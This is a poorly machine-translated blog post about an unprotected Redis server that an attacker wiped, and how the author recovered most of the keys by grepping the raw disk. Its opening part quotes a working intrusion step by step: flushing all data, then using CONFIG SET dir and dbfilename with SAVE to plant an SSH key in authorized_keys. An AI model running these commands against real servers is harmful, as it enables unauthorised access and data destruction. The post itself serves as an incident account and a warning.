For certain, the reader knows or at least heard about Redis, but just in case I will remind that this high-performance key-value storage (subarmor it is possible to esteem on here). Let's begin with the fact that in documentation it is said that Redis has to be available only in the entrusted environment that on the one hand is correct as the system administrator has to be engaged in safety, but on the other hand about it it preduprezhdeatsya any more anywhere.
Redis provides some basic functionality for safe data transmission in the unprotected connection. But we will not stop on it in detail, I will add only that, it is as if primitive did not sound, safety cannot be neglected and it is necessary to use the password at least. On it in documentation there is also warning:
There is an opportunity to control settings of the server using CONFIG command for change of a working deriktoriya or a name of the dump-file. It will allow kliyetna to write RDB Redis files in any folder that is a safety problem.
Who used vysheupomyanty article and by means of simple manipulations could do much harm to rather large number of people (it is visible from comments to article).
Attack happens as follows (the example is followed from article):
First of all, it is necessary to find the unprotected Redis-server. We generate a new RSA key. We create the file with blank lines in the beginning and at the end of our RSA of a key:
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
We delete all keys and we write data from the file:
$ redis-cli -h 192.168.1.11 flushall $ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
Now it was necessary to write data from a harnilishch in the authorized_keys file
$ redis-cli -h 192.168.1.11 > config set dir /Users/antirez/.ssh/ OK > config get dir 1) "dir" 2) "/Users/antirez/.ssh" > config set dbfilename "authorized_keys" OK > save OK
It is ready. If everything passed successfully, then we erased all data from storage and now we can be connected on ssh. Not really pleasantly, truth? Actually it is not the end and data it is possible to recover even if there is no backup. Just about it my small history is lower.
Our project is implemented on Django and uses django-constance. Redis is located on the separate server in order that several other projects could use it.
One fine evening to me messages on strange errors began to come. When it became clear that there are no data in Redis-storage, began small panic.
It turned out that django-constance without having found data, filled everything from a standartynma with values, but this fact confused the occurring situation even more. Gradually I began to realize that anybody has no backup and on data recovery about two days will leave that could not please in any way. It became clear later that after departure of the previous developer, I did not have access to the server on which Redis is located therefore to understand in what the problem did not turn out at once. The situation is unpleasant, but to be given was early.
On it problems did not come to an end and to my surprise there was no limit when I a smog am connected to storage without password, than, apparently, and the malefactor used. The attention was drawn by a strange key of "crackit" and after a short gugleniye it became clear that someone used article specified right at the beginning.
At the same time having decided to check this method and to get access to the server, I tried to carry out attack, but access rights on the .ssh folder prohibited record for the user of redis (under whom the server works by default). So I at least udostovererlsya that the malefactor did not get full access to the server.
Before taking any actions, I made a complete backup of the hard drive to leave data in an original form. At once the idea to recover remote data by means of some software came, but having tried couple of utilities which did not bring any results, I began to realize all tragedy of a situation. Moscow time there were already 4 mornings, and on other side of the planet where the project is started, there was already a middle of the working day and all waited when the project earns. Having almost reconciled to the fact that to recover data it will not be obtained, I decided to walk once again by possible options. And here the thought which seemed to me at first quite strange came to my mind. And what if to walk search on / dev/sda1?
Respectively data if they did not get yet, had to remain there. The question as them decided to find quickly enough too. Having opened the Redis file of base in a text editor, I saw that keys and values are stored there in pure form. All keys interesting me began with "constance:" this feature is also decided to be used for search.
Not ozhidav that it can work I executed the grep command - a ‘constance:’/dev/sda1 and began to wait. My surprise was big when on the screen the first records began to appear. Having collected and having a little processed results, I began to analyze them. It is good that a day before the incident one of keys was corrected and was unique, and on it it was already easy to find also other valid data. 40 minutes later 135 keys from 147 were recovered. It was necessary only not to forget to add the password to the Redis-servers settings.
This article is a translation of the original post at habrahabr.ru/post/270799/
If you have any questions regarding the material covered in the article above, please, contact the original author of the post.
If you have any complaints about this article or you want this article to be deleted, please, drop an email here: firstname.lastname@example.org.
We believe that the knowledge, which is available at the most popular Russian IT blog habrahabr.ru, should be accessed by everyone, even though it is poorly translated.
Shared knowledge makes the world better.